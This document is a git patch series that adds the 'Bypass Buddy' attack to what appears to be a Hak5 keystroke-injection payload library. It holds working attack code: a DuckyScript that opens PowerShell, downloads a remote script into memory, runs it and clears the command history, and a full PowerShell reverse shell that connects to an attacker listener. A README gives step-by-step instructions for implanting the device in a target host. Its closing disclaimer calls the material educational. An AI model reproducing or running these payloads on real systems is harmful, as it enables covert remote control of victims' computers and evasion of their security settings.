From dd72e4b9cc14a6367759cd370eebdfcfb505e45a Mon Sep 17 00:00:00 2001 From: salt-or-ester <133813929+salt-or-ester@users.noreply.github.com> Date: Fri, 13 Sep 2024 12:29:59 -0700 Subject: [PATCH 01/10] Create bypass-buddy.txt In this DuckyScript™, we explore a method to evade Windows 11's Script Execution Policy protections. The approach involves downloading a script to RAM, then executing it in RAM on-the-fly. This can be accomplished **without** administrative rights. --- .../execution/bypass-buddy/bypass-buddy.txt | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 payloads/library/execution/bypass-buddy/bypass-buddy.txt diff --git a/payloads/library/execution/bypass-buddy/bypass-buddy.txt b/payloads/library/execution/bypass-buddy/bypass-buddy.txt new file mode 100644 index 00000000..82f654e3 --- /dev/null +++ b/payloads/library/execution/bypass-buddy/bypass-buddy.txt 
@@ -0,0 +1,31 @@ +REM_BLOCK + The Bypass Buddy + by salt-or-ester - salt-or-ester@protonmail.com + Tested on: O.MG Plug Elite, Windows 11 + Will likely work on other devices and Windows flavors + + The Bypass Buddy implements a method to evade Windows script execution + policy protections. + + The approach involves downloading a Powershell script into memory (not disk), + and running it on-the-fly. + + This can be accomplished without administrative rights. +END_REM + +REM Payload to download and run in memory +DEFINE #PAYLOAD_URL "http://10.10.10.10/payload.ps1" + +FUNCTION EVADE_SCRIPT_EXECUTION_POLICY() +GUI r +DELAY 2000 REM Let GUI load +STRINGLN powershell +DELAY 1000 REM Let Powershell window open +STRINGLN Start-Job -ScriptBlock { try { $response = Invoke-WebRequest -Uri #PAYLOAD_URL -ErrorAction Stop; $scriptContent = [System.Text.Encoding]::UTF8.GetString($response.Content); cd ~; Invoke-Expression $scriptContent } catch { Write-Error "Failed to download or execute script: $_" } } +STRINGLN Clear-History +STRINGLN clear +GUI DOWNARROW +END_FUNCTION + +DELAY 3000 REM Wait for device to be "ready" +EVADE_SCRIPT_EXECUTION_POLICY() From a8ad722e5c3ffbb034d345f942c901e093ad30cc Mon Sep 17 00:00:00 2001 From: salt-or-ester <133813929+salt-or-ester@users.noreply.github.com> Date: Fri, 13 Sep 2024 12:31:17 -0700 Subject: [PATCH 02/10] Add files via upload In this DuckyScript™, we explore a method to evade Windows 11's Script Execution Policy protections. The approach involves downloading a script to RAM, then executing it in RAM on-the-fly. This can be accomplished **without** administrative rights. --- .../library/execution/bypass-buddy/README.md | 64 +++++++++++++++++++ .../execution/bypass-buddy/reverse-shell.ps1 | 42 ++++++++++++ 2 files changed, 106 insertions(+) create mode 100644 payloads/library/execution/bypass-buddy/README.md create mode 100644 payloads/library/execution/bypass-buddy/reverse-shell.ps1 
diff --git a/payloads/library/execution/bypass-buddy/README.md b/payloads/library/execution/bypass-buddy/README.md new file mode 100644 index 00000000..21455ca6 --- /dev/null +++ b/payloads/library/execution/bypass-buddy/README.md @@ -0,0 +1,64 @@ +# The Bypass Buddy: Bypass Script Execution Policies + +Running user (target) does **not** need to have admin rights. Bypass Buddy has only been tested on the [O.MG Plug Elite](https://hak5.org/products/omg-plug), Windows 11. It likely works on other [hak5 devices](https://hak5.org/products/) and Windows distributions -- the payload is written in standard DuckyScript™. + +## Overview + +### Target Has a Strict "Script Execution Policy"? Evade it and Run Whatever Script You Please! + +In this DuckyScript™, we explore a method to evade Windows 11's Script Execution Policy protections. The approach involves downloading a script to RAM, then executing it in RAM on-the-fly. This can be accomplished **without** administrative rights. + +
+ +
+ +## How It Works + +To avoid Windows Script Execution policies: +1. **Upload** your .ps1 script to any webserver. +2. **Download** the Powershel script to memory on the target host. +3. **Execute** the Powershell script in RAM dynamically on your target host. +*Note: Nothing is ever written to disk.* + +## Steps to Execute a Restricted Powershell Payload + +1. **Prepare Your Powershell Script (.ps1)** + - Create your Powershell script. The example `reverse-shell.ps1` creates a reverse shell on the target host. You can create any Powerscript payload you please. + +2. **Upload Your Powershell Payload** + - Upload your .ps1 script to the serving-directory of your (attacking) webserver. + +3. **Set Up Your Listener** + - Open a listener on your receiving (attacking) host using Netcat or any listener you please: + ```bash + nc -v -p 4111 + ``` + +4. **Prepare Your DuckyScript™ Payload** + - Add `bypass-buddy.txt` to the 'boot' slot of your O.MG Plug. + +5. **Deploy the O.MG Plug** + - Implant your O.MG Plug into the target host. + +6. **Wait for Connection** + - Wait for the target host to connect to your listener. + +7. **Verify the Connection** + - Type `whoami` into the reverse shell and hit enter. + +8. **Success!** + - You did it! + ++ +
+ +## Notes + +- **Ensure** to modify both `reverse-shell.ps1` and `bypass-buddy.txt` with your specific configurations, including the IP address and port of your sending/receiving hosts, if you choose to use `reverse-shell.ps1` as your payload. +- In cases where you'd like to create your own .ps1 payload, modify just `bypass-buddy.txt` with your webserver's host/IP and script name. +- This method is a **proof-of-concept** and should be tested responsibly and legally. + +--- + +*Remember, the purpose of this proof-of-concept is educational and for understanding how RAM injection/execution can be used to bypass certain security measures. Always use these techniques ethically and within the bounds of the law.* diff --git a/payloads/library/execution/bypass-buddy/reverse-shell.ps1 b/payloads/library/execution/bypass-buddy/reverse-shell.ps1 new file mode 100644 index 00000000..836dafb8 --- /dev/null +++ b/payloads/library/execution/bypass-buddy/reverse-shell.ps1 
@@ -0,0 +1,42 @@ +# Create a TCP client and connect to the specified address and port +$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10', 4111) +$stream = $client.GetStream() +$writer = New-Object System.IO.StreamWriter($stream) +$reader = New-Object System.IO.StreamReader($stream) +$writer.AutoFlush = $true + +# Continuously listen for commands and execute them +while ($true) { + try { + # Read command from the listener + $command = $reader.ReadLine() + + # Check if the command is null or empty and continue to next iteration + if ([string]::IsNullOrWhiteSpace($command)) { + continue + } + + # Execute the command and capture the output + $output = Invoke-Expression $command 2>&1 | Out-String + + # Send the output back to the listener + $writer.WriteLine($output) + } + catch { + # Handle any errors that occur during command execution + $errorMessage = $_.Exception.Message + $writer.WriteLine("Error: $errorMessage") + } + finally { + # Check if the stream is still open, if not, re-establish the connection + if (-not $client.Connected) { + $client.Close() + Start-Sleep -Seconds 5 # Sleep before trying to reconnect + $client = New-Object System.Net.Sockets.TCPClient('10.10.10.10', 4111) + $stream = $client.GetStream() + $writer = New-Object System.IO.StreamWriter($stream) + $reader = New-Object System.IO.StreamReader($stream) + $writer.AutoFlush = $true + } + } +} \ No newline at end of file From f5ae0446db3239798d22b64cf3bc4aff643b945d Mon Sep 17 00:00:00 2001 From: salt-or-ester <133813929+salt-or-ester@users.noreply.github.com> Date: Fri, 13 Sep 2024 12:32:16 -0700 Subject: [PATCH 03/10] Create tmp --- payloads/library/execution/bypass-buddy/img/tmp | 1 + 1 file changed, 1 insertion(+) create mode 100644 payloads/library/execution/bypass-buddy/img/tmp diff --git a/payloads/library/execution/bypass-buddy/img/tmp b/payloads/library/execution/bypass-buddy/img/tmp new file mode 100644 index 00000000..3f3ae824 --- /dev/null 
+++ b/payloads/library/execution/bypass-buddy/img/tmp @@ -0,0 +1 @@ +In this DuckyScript™, we explore a method to evade Windows 11's Script Execution Policy protections. The approach involves downloading a script to RAM, then executing it in RAM on-the-fly. This can be accomplished **without** administrative rights. From 7428e9201009d9d4c5004638fdeb63f446b2bdd9 Mon Sep 17 00:00:00 2001 From: salt-or-ester <133813929+salt-or-ester@users.noreply.github.com> Date: Fri, 13 Sep 2024 12:32:53 -0700 Subject: [PATCH 04/10] Add files via upload --- .../library/execution/bypass-buddy/img/art.txt | 9 +++++++++ .../execution/bypass-buddy/img/evasion.png | Bin 0 -> 24553 bytes .../bypass-buddy/img/reverse-shell.png | Bin 0 -> 173467 bytes .../execution/bypass-buddy/img/the-eye.png | Bin 0 -> 129826 bytes 4 files changed, 9 insertions(+) create mode 100644 payloads/library/execution/bypass-buddy/img/art.txt create mode 100644 payloads/library/execution/bypass-buddy/img/evasion.png create mode 100644 payloads/library/execution/bypass-buddy/img/reverse-shell.png create mode 100644 payloads/library/execution/bypass-buddy/img/the-eye.png diff --git a/payloads/library/execution/bypass-buddy/img/art.txt b/payloads/library/execution/bypass-buddy/img/art.txt new file mode 100644 index 00000000..35a839d9 --- /dev/null +++ b/payloads/library/execution/bypass-buddy/img/art.txt 
@@ -0,0 +1,9 @@ +▀█████████▄ ▄██ ▄ ▄███████▄ ▄████████ ▄████████ ▄████████ ▀█████████▄ ███ █▄ ████████▄ ████████▄ ▄██ ▄ + ███ ███ ███ ██▄ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ▀███ ███ ▀███ ███ ██▄ + ███ ███ ███▄▄▄███ ███ ███ ███ ███ ███ █▀ ███ █▀ ███ ███ ███ ███ ███ ███ ███ ███ ███▄▄▄███ + ▄███▄▄▄██▀ ▀▀▀▀▀▀███ ███ ███ ███ ███ ███ ███ ▄███▄▄▄██▀ ███ ███ ███ ███ ███ ███ ▀▀▀▀▀▀███ +▀▀███▀▀▀██▄ ▄██ ███ ▀█████████▀ ▀███████████ ▀███████████ ▀███████████ ▀▀███▀▀▀██▄ ███ ███ ███ ███ ███ ███ ▄██ ███ + ███ ██▄ ███ ███ ███ ███ ███ ███ ███ ███ ██▄ ███ ███ ███ ███ ███ ███ ███ ███ + ███ ███ ███ ███ ███ ███ ███ ▄█ ███ ▄█ ███ ███ ███ ███ ███ ███ ▄███ ███ ▄███ ███ ███ +▄█████████▀ ▀█████▀ ▄████▀ ███ █▀ ▄████████▀ ▄████████▀ ▄█████████▀ ████████▀ ████████▀ ████████▀ ▀█████▀ + \ No newline at end of file diff --git a/payloads/library/execution/bypass-buddy/img/evasion.png b/payloads/library/execution/bypass-buddy/img/evasion.png new file mode 100644 index 0000000000000000000000000000000000000000..2f84a0ef5c74b0db2cf6fb3c6d8d03f932683ac8 GIT binary patch literal 24553